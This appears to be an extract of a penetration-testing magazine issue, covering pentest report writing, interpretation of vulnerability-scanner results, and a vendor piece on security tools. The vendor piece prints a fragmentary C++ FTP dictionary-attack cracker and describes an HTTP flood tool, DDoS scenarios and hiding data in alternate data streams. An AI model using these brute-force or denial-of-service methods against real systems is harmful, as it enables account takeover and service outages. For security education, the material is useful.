Professional Documents
Culture Documents
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
Although various tools exist that can
examine some elements of a configuration,
the assessment would typically end up
being a largely manual process. Nipper
Studio is a tool that enables penetration
testers, and non-security professionals, to
quickly perform a detailed analysis of
network infrastructure devices. Nipper
Studio does this by examining the actual
configuration of the device, enabling a much
more comprehensive and precise audit than
a scanner could ever achieve.
www.titania.com
Table of Contents
200 OK on Audience
by Vijay Velu
Dreamwalker Software
by Craig Fox
by Scott Chester, Viviana Dragu, Ryan Bentley, Duane Baldwin and Chris Cronin
07
18
31
34
41
51
61
68
79
86
97
Dear Readers,
This time, we have decided to cover some topics which in our opinion dont get enough attention in the
community. Most of the testers focus on technical issues and they usually forget how important it is to have
an elegant and informative style of writing. Their clients often struggle when it comes to fixing the newly
discovered vulnerabilities mostly due to the testers poor communication skills. Almost everyone gets the
most fun from conducting the complex attacks, but we cannot forget how important it is to properly present
the results, so the outcome can be really valuable to the everyone involved.
In this issue, you will find many different ways of reporting. Some of them will be more complex and some
of them will be as simple as they can be. As a reader, you have the wonderful possibility to check them all
and choose the best option for yourself.
One would say: the whole publication about the reports? It is crazy, no one will read the entirety. Although
we disagree with this saying, many of you might have the simmilar approach, so only first four articles will
be devoted to the reporting. In the following sections, we will cover things such as vulnerability scanning,
sockstress, wireless pentesting and even the recent PCI DSS changes.
If you enjoyed any part if this publication, dont hesitate to tell us about it at en@pentestmag.com
It might take you a few minutes to write an email, but your opinion is priceless and it is the best reward we
can get.
[ GEEKED AT BIRTH ]
DISCLAIMER!
Presentation
The presentation of the results is critical. You have to target well according to the audience and you have to
hit the bulls-eye. A bad presentation can really murder great penetration test results especially if there are
managers among the audience. The managers mind tends to turn off when faced with technical terms.
7
What works very well for the technical reports from my experience is to create the database where the
customer is able to filter using the parameters, sort according to classification of issues. You can also use the
pivot tables (or similar feature in the spreadsheet of your choice) to create summaries and different view of
the data.
Several tips on how to organize your report:
Be in sync with your presentation. Try to follow similar structure. Then the approach looks consistent and
is well understandable by the receivers of the deliverables.
Decide on the form. Separation to several files and directories might be a good idea, when there is a lot of
technical information and logs. If it would make the report huge (even for appendices) use separate files.
But be sure you reference those in the report. Also take care that there is not too much different files if
not required.
Start with general information, and then get more technical. Try to follow the approach of telling a story.
Give a preview on what will happen (executive summary), set-up the scene (describe scope, what was
done), tell the main story (what was found, how critical is it, how it was found) and then happily ever after
(remediation, next steps, etc.). Put the hard-core technical stuff in the appendices.
Document the scope. The scope has to be fixed with the customer to avoid any disputes in the end. It is
very important to document the scope within the final deliverable. It will serve as reference on what was
targeted. If there are some parts that were (for some reason) excluded from the scope, those should be
documented as well.
Document utilized methodologies. It is important to document the crucial parts of the activity as well as
the findings. The pentester has to prove, that his methodology is reasonably effective, repeatable and to
some extent bulletproof. If you are using some of the well-established methodologies, do reference those.
It might boost the credibility of your work.
Create a structured document. Always provide a document that has a reference matrix. It is a good idea to
reference specific findings.
Use Appendixes. If there is a need to include technical documentation in the report (you dont want
to deliver separate files) use appendixes. Those are usually at the end of the document numbered
alphabetically.
Keep the size of the report reasonable. It might be a good idea to keep the main report document
reasonable in size. People like to print the document and with reasonable length it might be easier to
orient. Pasting the outputs of the tools in the Appendixes might enlarge the document dramatically.
Unless explicitly agreed with the customer, never use the output of the tools as a report. Managers will not
understand the details of the findings and the work will not be treated as professional (sometimes not even
by security people). For the price of the pentest, the company can buy and run Nessus itself.
11
12
CYBER SECURITY
IN OIL AND GAS 2014
27 29 January 2014 | Abu Dhabi, U.A.E.
Register before November 15, 2013 and take advantage of early bird rate.
For Sponsorship Opportunites, contact us at +971 4 884 1110
kristine.tuazon@caxtongroup.com
Developed by
Media Partners
www.caxtongroup.com
15
16
17
Figure 4. Top 10 products with the most reported vulnerabilities. Report by Qualys
Default or easy passwords. These are probably the most dangerous and the most common security issues.
How many of your Cisco routers have a default password cisco? How many Microsoft SQL servers have
empty password for the SA account? If you find these issues on your network, you probably have some
serious gaps in your security. The examples above are probably easy to fix or discover. It is more difficult
to fix for example, Tomcat or Jboss servers with default accounts. During the installation process,
Tomcat doesnt provide the administrator with an option to change the default password and installs itself
with username tomcat and password tomcat. Knowing these credentials, it is possible for a potential
hacker to change the configuration of the web server or even deploy new applications, which usually
provides full access to a server.
Insecure services or protocols. FTP, Telnet, HTTP protocols are still widely used. All these protocols
transmit credentials in cleat text. Hackers can sniff a network, intercept traffic or perform Man-in-theMiddle attacks and gain unauthorised access to information. Telnet usually provides command line access
to the target device, so integrity or availability of information can be affected. Anonymous FTP servers
can provide write access to the server, so hackers can store prohibited materials on them, such as
cracked software, pirated movies etc.
Web application vulnerability scanning reports usually contain following issues:
SQL injection and XSS vulnerabilities. These vulnerabilities happen because developers dont validate
input or output parameters properly. SQL injection vulnerability allows external attackers to put malicious
SQL commands into URL parameters and manipulate backend databases: create, modify, delete the
tables, grab users passwords, and upload malware on the server. XSS (Cross-site scripting) issues allow
hackers to attack customers, which affects the companys reputation and damages the brand. These issues
should be fixed as soon as possible.
Encryption issues. SSL v2 currently is considered insecure and was supervised by SSL v3 back in 1996.
However, a large number of websites still support it. Recommendation? Disable it! All browsers releases
after 1997 support SSL v3 so there shouldnt be compatibility issues. If a user connects to a websites
(eCommerce, banking application etc.) using SSL v2, hackers sniffing the traffic have a very good chance
to decrypt it and get access to credentials. In addition, if you are running online shop and process credit
card details, having SSL v2 enabled on your website means failing PCI DSS compliance.
Click jacking and Cross-frame scripting. This is very debatable topic and there are a lot of articles and
talks about this at the time of writing this article. Should we rank this vulnerability as high critical or
informational? Burp Suite reports XSF issues as informational (not even low), Acunetix and Netsparker
18
False positives
All reports (remember, ALL reports) contain false positives. Even if a vendor of the vulnerability scanner
tells that their product doesnt produce false positives, it is not exactly correct. Indeed vulnerability may be
on the website, but the severity should be always questioned. All the websites are different depending on the
business requirement and no security product has a signature database that fits them all. Some common false
positives are listed below:
Outdated software. Most vulnerability scanners determine a software version based on a banner it
presents. For example, when you connect to the Apache web server, headers or error messages usually
tell you which version of software is used. Can you trust this information? No. Administrators can easily
change a version number to trick the potential attackers. They can increase the version number to make
an impression that they are running the latest version of the software. Or they may even want to decrease
the version to create a honeypot, so that hackers spend their time attacking less valuable asset. Sometimes
updates dont increase the version number: for example, if you are running Apache on Red Hat, security
patches wont affect the version.
Brute force attacks. It is very usual to see the vulnerability scanners reporting that a web application is
vulnerable to brute force attack. How do they check it? They try the same credentials several times, usually
five or ten times, and analyse the reaction to this activity. They expect that the web application will present
an error after ten times saying that the account is locked and a user should contact the support department
or use the password forget link. But what if the web application doesnt display an error but still blocks an
account? This case is very difficult to handle and should be verified manually by the security analyst. The
verification is very straight forward: just try to login to the account after ten unsuccessful login attempts. If
you can login in, then you have an issue. If not, mark the issue as a false positive.
Changed admin credentials or paths. One of the best practices is to assign the administrator account
to Guest usergroup and rename the real admin account to something not obvious, for example John.
19
False negatives
How can you find false negatives in the report? The simple answer: you cant. False negatives are the
vulnerabilities which were not discovered by the scanner, but present on the real site. The security analyst
should be aware when false negatives can happen and make sure they are discovered by manual testing.
Out-of-Band Authentication. In order to improve the security, many companies implement two factor
authentication or user registrations with out-of-band communications. This includes sending SMS to
a customer mobile phone, calling a customer, sending emails or using a Mobile application to login.
The tester should manually review the login process and see if there are potential security issues. Is the
new password sent to the user in clear text? Is the SMS code predictable, for example incremental? Is it
possible to hijack a customer account if a hacker has physical access to the phone? Create use or business
cases and try to understand the end-to-end data flow to perform a comprehensive risks assessment.
Business login flaws. For a complex application, which gathers data from different sources and have
multiple user profiles and products, each business transaction should be analysed for potential issues. The
vulnerability scanners can tell if input fields dont filter the malicious code, but they cant tell you whether
your business process is well designed or not. Do you remember the recent vulnerability in Skype?
Hackers could hijack users account by simply contacting the support department! The user validation
was based on telling five contact details from the list, email that was used during the registration and
a full name. All these details can be easily obtained or discovered, so a large number of accounts were
compromised. Definitely a business process flaw.
Restricted pages and lack of privileges. A typical marketing website has in average two or three privilege
levels (user level and admin), but a banking application may have more than a hundred different roles and
hundreds of different privileges. In order to perform the comprehensive vulnerability assessment, you need
to create N*M size matrix, where N is a number of privileges, M is a number of functions and test all input
parameters using different credentials. Vulnerability scanners can do a good job for small applications;
however, complex web portals require a lot of manual configuration from the security analyst.
Consequences
Minor
MEDIUM
LOW
LOW
Moderate
HIGH
MEDIUM
LOW
Major
HIGH
HIGH
MEDIUM
21
Summary
The network and web application vulnerability management process is very important to keep the
organisation secure and minimise the risk of compromise. Vulnerability scanners will help to proactively
identify issues before the external hackers can discover them. To achieve the best results, reports should be
analysed and appropriate actions should be undertaken to mitigate the risks.
The security analyst should have experience and knowledge of common hacking attacks and mitigation
strategies;
Obtain the feedback from the IT team and senior management when categorising issues and assessing the
security risk;
Try to reduce the number of false positives to make sure you focus on important issues;
Review the scope manually to ensure the vulnerability scanners have covered all the functions, inputs and
services;
Keep records to show to external auditors, senior management or other team members.
Remember, the main purpose of the vulnerability management process is to reduce the risk to acceptable
level. Tools like vulnerability scanners can provide the data and perform some routine tasks, but team input
is absolutely required to achieve the best results.
22
On the Web
Glossary
Vulnerability assessment A process for identifying inadequate computer and network securities that cause technological weaknesses. Assessments also generally include methods for prioritizing and implementing additional security
measures for fixing and protecting systems.
Application programming interface (API) In most procedural languages, an API specifies a set of functions or routines that accomplish a specific task or are allowed to interact with a specific software component.
Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network and/or system activities for malicious activity.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.
The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards.
SA account The SA account is created during the installation process of the MS SQL server and the sa account has
full rights in the SQL Server environment. By default, the SA password is blank (NULL), unless you change the password when you run the MSDE Setup program.
Out-of-Band Authentication is the use of two separate networks working simultaneously to authenticate a user.
Use case- In software and systems engineering, a use case is a list of steps, typically defining interactions between a
role (known in Unified Modeling Language (UML) as an actor) and a system, to achieve a goal. The actor can be a
human or an external system.
23
Dreamwalker Software
by Craig Fox
At Dreamwalker software, we create tools aimed at IT security professionals and hobbyists
alike. We also offer penetration/ethical hacking services for small companies which has
only recently been implemented. Generally speaking most of our software is free as we rely
on donations to help keep us running and we enjoy sharing tools and code with no cost,
but this will only last as long as donations remain steady so if you find any of the software/
information below useful please consider helping us out by sharing our site, dusting the
cobwebs from your wallet and dropping us some gold, well love you long time. The aim of
this article is to inform you about the latest Dreamwalker software by discussing their origin,
usage and providing practical scenarios.
Technical stuff
This tool is a compact vulnerability scanner for webservers that has a plethora of features and is constantly
being updated. Currently its coded in VC++ using .NET 3.5 and Winsocks/Win Inet but were also working
on a cross platform Java version which will decrease some speed but is worth it for the portability. The
downloaded version includes a win32 compiled version.
Scenario
Youre testing a website for vulnerabulities, you decide to gain some information on the server in an
automated manner. With this tool you perform as scan and await the results, the results show ports 80, 21,
22 and 443 is open. You now know that HTTP, FTP, SSH and SSL services are running on this server which
opens up several opportunities for exploits and entry points. Furthermore you find that it has a reachable
login page, potential SQL injection page, robots.txt and sitemap.xml. Using this you may be able to use SQL
injection to exploit the database and server through the login page, you could also see the robots.txt file to
see files/directories they do/dont want search engines to see and also look at the sitemap.xml file. Both
methods give you further information on the target. You later decide to stress test the server to see how it
handles, along with how the staff respond by lanching and DDoS attack.
Features
URL Scanning: This is arguably the best feature, Lucidity will perform URL based scanning on files and
directories to find potential vulnerabilities. This ranges from SQL injection potential, front page enables
servers, login pages and doxing information such as robots.txt, sitemap, configs etc.
TCP Port Scanning: This is a socket connect based scan which doesnt got within a range but scans
most likely relevant ports that will be useful purely for speed sake (bare in mind this is just a quick non
comprehensive scan tool) such as, FTP, HTTP, SSL, SMTP, TELNET, SSH, POP3, MySQL and so on to
help you identify the services running and thus help you map out potential weaknesses and entry points.
HTTP Denial Of Service attack: This is in working progress due to some recent bugs, but basically it sends
50,000 TCP socket requests to port 80 in an attempt to disrupt the sevice.
Technical stuff
This is coded in C++ but uses WinInet, it is completely open source and the download includes a Win32 compiled
version, along with the username.txt and passwords.txt files to get you started with some basic combinations.
Scenario
During testing, you decide that a good entry point into their system is via FTP which holds many company
sensitive documentation. You try to log in annonymously but that is disabled, as you need access, more
specifically read/write access you decide to crack an account. You then run this tool and allow it time to
25
Features
Its incredibly simple in its code and concept, it performs a remote dictionary attack on the targeted
webserver until a sucessful authentication is met. You can add as much to the username and password file as
you want in order to increase your chances, but without me blabbering on.
Ill paste the code here as it is so small:
Listing 1. Source code of OpenFTP
#include
#include
#include
#include
#include
<windows.h>
<wininet.h>
<iostream>
<string>
<fstream>
//get files
std::ifstream user_reader(usernames.txt);
std::ifstream pass_reader(passwords.txt);
//file error handling
if((!user_reader)||(!pass_reader))
{
26
while(!user_reader.eof())
{
SetConsoleTextAttribute(hConsole, 7);
attempts++;
getline(pass_reader,passwords);
std::cout<<Trying username +usernames+ with password +passwords+ attempts
<<attempts<< ;
//Connect to FTP server with provided credentials
hFtpSession = InternetConnect(hInternet,target.c_str(),INTERNET_DEFAULT_FTP_
PORT,usernames.c_str(),passwords.c_str(), INTERNET_SERVICE_FTP,INTERNET_FLAG_PASSIVE,0);
//is password cracked?
if(!hFtpSession)
{
SetConsoleTextAttribute(hConsole, 12);
std::cout<<= FAIL<<std::endl;
InternetCloseHandle(hFtpSession);
}
else if(hFtpSession)
{
SetConsoleTextAttribute(hConsole, 10);
std::cout<<\n\nCracked +target+\nThe username is: \+usernames+\\nPassword
is: \+passwords+\<<std::endl;
InternetCloseHandle(hFtpSession);
break;
}
if(pass_reader.eof())
{
//reset pass file
pass_reader.clear();
pass_reader.seekg(0,std::ios::beg);
//get next username
getline(user_reader,usernames);
27
InternetCloseHandle(hInternet);
pass_reader.close();
user_reader.close();
std::cout<<\nFinished, please close this application<<std::endl;
std::cin>>temp;
return 0;
As you can see the code is simple, but very effective. Youll notice how the loop works by checking each
password iteration against a username before moving onto the next. This was a function that we created a
while back when we did a proof of concept dictionary and brute force cracker and we havent changed it one
bit, aside from the conditions.
Even though its open source, the code, unfortunately isnt cross platform. While generally speaking our
open source tools aims to be just that, in this particular case WinInet was very simple and useful for doing
this, however, it would be quite easy to port this to other languages and/or use different resources (ie;
networking lib etc) to compile for other platforms.
Technical Stuff
This is code in VC++ using .NET 3.5+, and a win32 version included in download.
Scenario
Youre on a local network in a windows environment, its early stage of the testing and you decide to start
gaining information on the target. You run this against a local machine and find that it accepts the Null
session, and also shows the shares. This information can be used to compromise the system.
28
Features
The way it works is youll put in a target system (WAN or LAN) and it will run windows based commands,
pipe them, store them to a temporary file and display the results. It will do things like pinging, perform a
zone transfer, try a null session, attempt to access shares, tracert and so on in a neat and concise manner
providing you with a slick, easy to use automated tool in your reconaisance/early stages of a penetration
test on a windows based environment. At first, we created this tool as a command line tool which saves the
results to a file, but due to user feedback and requests, weve done it like this for efficiency, clarity and a
better end user experience.
Scenario
You are stress-testing a webserver for DDoS conditions, it has very good IDS hardware and software
and you just dont have the bots or bandwaidth resources to slow this server down. After a little manual
probing, you find several resources on the server which are rather CPU and memory intense, so you run this
tool against all the resources via different URLs in a scripted manner which requests large files and large
database queries etc and potentially crash the server.
Scenario
You are locally testing on a client, youre on a shared machine and need to hide some information on that
computer without raising suspicion. You use this tool and use the host C:\windows\system32\calc.exe and
run an ADS to a hidden text document which you hide sucessfully and open, write, save and close as many
times as you wish which you later extract. This can also be used for exploiting but is a little beyond this
simple scenario.
Summary
Well thats all, just a few of our tools discussed and outlined. I hope you found this article interesting. Feel
free to contact us, if you have any questions, requests etc.
On the Web
Lead te ster and coder, Craig Fox started out programming and studying IT security in his teen years
doing multiple official courses along with self training. He has worked for several companies employing
his technological skill set and is very active within the industry sector.
30